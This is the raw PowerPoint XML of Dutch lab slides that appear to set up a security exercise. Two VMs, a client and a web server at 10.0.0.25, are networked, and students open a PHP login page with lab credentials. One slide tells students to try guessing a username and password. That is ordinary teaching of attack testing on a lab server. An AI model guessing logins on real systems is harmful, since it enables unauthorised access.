              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: Je kunt ook in je eentje werken. Start dan beide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>VM's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> op, op je laptop. Beide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>VMs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> moeten dan op het </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>internal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>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79505" y="2930695"/>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8063" y="2867176"/>
            <a:ext cx="1343314" cy="132478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924259" y="4069583"/>
            <a:ext cx="3205424" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>Student1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>: (W2012)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>start WT-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> met </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vbox</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP: 10.0.0.1 (255.0.0.0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- kies bridge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> over de </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   fysieke netwerk kaart</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Tekstvak 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7129657" y="4069583"/>
            <a:ext cx="3205424" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>Student2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>: (W2012)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>start WT-server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vbox</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP: 10.0.0.25 (255.0.0.0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- kies bridge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> over de </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   fysieke netwerk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kaart</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Vrije vorm 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4170066" y="2994402"/>
            <a:ext cx="3456633" cy="582811"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3456633"/>
              <a:gd name="connsiteY0" fmla="*/ 582811 h 582811"/>
              <a:gd name="connsiteX1" fmla="*/ 1557494 w 3456633"/>
              <a:gd name="connsiteY1" fmla="*/ 7 h 582811"/>
              <a:gd name="connsiteX2" fmla="*/ 3456633 w 3456633"/>
              <a:gd name="connsiteY2" fmla="*/ 572763 h 582811"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3456633" h="582811">
                <a:moveTo>
                  <a:pt x="0" y="582811"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="490694" y="292246"/>
                  <a:pt x="981389" y="1682"/>
                  <a:pt x="1557494" y="7"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2133599" y="-1668"/>
                  <a:pt x="2795116" y="285547"/>
                  <a:pt x="3456633" y="572763"/>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146"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5847" y="3451118"/>
            <a:ext cx="565639" cy="3181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83851" y="3440830"/>
            <a:ext cx="584526" cy="318172"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Tekstvak 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5248651" y="2600947"/>
            <a:ext cx="1107440" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kabel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Tekstvak 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5237350" y="4226006"/>
            <a:ext cx="1806546" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Kijk of je elkaar kunt pingen</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Tekstvak 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9415305" y="1084170"/>
            <a:ext cx="2535091" cy="646331"/>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hoe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> werkt is al besproken in week1</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1580724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Test opstelling maken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a:t>: testomgeving opzetten/bekijken</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Stap2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: Kijk of je met de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> de webserver kun bereiken</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79505" y="2930695"/>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8063" y="2867176"/>
            <a:ext cx="1343314" cy="132478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924258" y="4069583"/>
            <a:ext cx="4305720" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>Student1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>: (de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>2.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>open een browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>2.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>vul de volgende URL in:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       http://10.0.0.25/SI/mainpage.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>(je wordt naar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t> geleid)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>2.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t> vul in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abcde</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Tekstvak 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7129657" y="4069583"/>
            <a:ext cx="3205424" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>Student2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>: (de Webserver)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Vrije vorm 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4170066" y="2994402"/>
            <a:ext cx="3456633" cy="582811"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3456633"/>
              <a:gd name="connsiteY0" fmla="*/ 582811 h 582811"/>
              <a:gd name="connsiteX1" fmla="*/ 1557494 w 3456633"/>
              <a:gd name="connsiteY1" fmla="*/ 7 h 582811"/>
              <a:gd name="connsiteX2" fmla="*/ 3456633 w 3456633"/>
              <a:gd name="connsiteY2" fmla="*/ 572763 h 582811"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3456633" h="582811">
                <a:moveTo>
                  <a:pt x="0" y="582811"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="490694" y="292246"/>
                  <a:pt x="981389" y="1682"/>
                  <a:pt x="1557494" y="7"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2133599" y="-1668"/>
                  <a:pt x="2795116" y="285547"/>
                  <a:pt x="3456633" y="572763"/>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146"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5847" y="3451118"/>
            <a:ext cx="565639" cy="3181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83851" y="3440830"/>
            <a:ext cx="584526" cy="318172"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Tekstvak 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5248651" y="2600947"/>
            <a:ext cx="1107440" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kabel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Afbeelding 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6496522" y="4650003"/>
            <a:ext cx="1770573" cy="1011756"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Rechte verbindingslijn met pijl 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5683678" y="5367363"/>
            <a:ext cx="812844"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19" name="Afbeelding 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6496522" y="5737748"/>
            <a:ext cx="2274100" cy="831391"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Rechte verbindingslijn met pijl 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4368377" y="6176758"/>
            <a:ext cx="2128145"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kstvak 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9473212" y="4739208"/>
            <a:ext cx="2352613" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Probeer een user en een password te raden.!!!!!</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="200673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oomdiagram: Document 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9633572" y="2367446"/>
            <a:ext cx="2250832" cy="2802648"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDocumen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3" name="Stroomdiagram: Document 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2393106" y="2423712"/>
            <a:ext cx="2250832" cy="2802648"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDocumen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Stroomdiagram: Document 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5918479" y="2394273"/>
            <a:ext cx="2250832" cy="2802648"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDocumen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7776232" cy="650375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>Voorbereiding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t> files bekijken.</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testomgeving opzetten/bekijken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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Rechte verbindingslijn met pijl 32"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7138755" y="4257262"/>
            <a:ext cx="0" cy="1399357"/>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8" name="Tekstvak 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
